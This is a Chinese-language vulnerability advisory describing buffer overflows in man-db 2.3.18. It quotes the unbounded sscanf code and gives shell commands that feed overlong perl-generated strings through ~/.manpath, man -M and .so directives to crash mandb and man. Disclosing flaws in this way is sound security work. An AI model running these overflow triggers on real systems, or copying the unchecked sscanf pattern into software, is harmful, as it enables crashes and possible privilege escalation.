ManDB工具多个缓冲区溢出问题发布时间:2003-08-01 更新时间:2003-08-01 严重程度:中 威胁程度:权限提升 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:8303 受影响系统 man man 2.3.18详细描述 man-db在调用多个sscanf()调用时没有进行正确边界检查,部分有问题代码如下: static void add_to_dirlist (FILE *config, int user) { char *bp; char buf[BUFSIZ]; char key[50], cont[512]; int c; while ((bp = fgets (buf, BUFSIZ, config))) { while (isspace (*bp)) bp++; if (*bp == '#' || *bp == '\0') continue; else if (strncmp (bp, "NO", 2) == 0) continue; else if (sscanf (bp, "MANBIN %*s") == 1) continue; else if (sscanf (bp, "MANDATORY_MANPATH %s", key) == 1) add_mandatory (key); else if (sscanf (bp, "MANPATH_MAP %s %s", key, cont) == 2) add_manpath_map (key, cont); else if ((c = sscanf (bp, "MANDB_MAP %s %s", key, cont)) > 0) add_mandb_map (key, cont, c, user); else if ((c = sscanf (bp, "DEFINE %50s %511[^\n]", key, cont)) > 0) add_def (key, cont, c); else if (sscanf (bp, "SECTION %511[^\n]", cont) == 1) add_sections (cont); else if (sscanf (bp, "SECTIONS %511[^\n]", cont) == 1) /* Since I keep getting it wrong ... */ add_sections (cont); else { error (0, 0, _("can't parse directory list `%s'"), bp); gripe_reading_mp_config (CONFIG_FILE); } } } 可以看到MANDATORY_MANPATH, MANPATH_MAP, 和MANDB_MAP没有正确限制值写入key[50]或者cont[512],提供超长字符串可以触发漏洞。 另外在ult_src()函数处理上也存在此漏洞,及对PATH/MANPATH 参数缺少充分处理,可导致溢出。 测试代码 # cd /tmp # mkdir x # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath # mandb Segmentation fault (can also apply this to the "man" binary, by fooling it with links) # cd /tmp # mkdir x # ln /usr/bin/man mandb # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath # ./mandb Segmentation fault # man -M `perl -e 'print"/"x2100'`usr/share/man ls ...(verbose) Segmentation fault # cd /tmp # mkdir man man/man1 # echo .so `perl -e 'print"x"x1024'` >man/man1/x.1 # man -M /tmp/man x ...(verbose) Segmentation fault # man -M `perl -e 'print"/tmp:"x260'` x Segmentation fault 解决方案 CVS服务器已经提供更新: savannah.nongnu.org 相关信息 参考:http://www.securityfocus.com/archive/1/330907 |
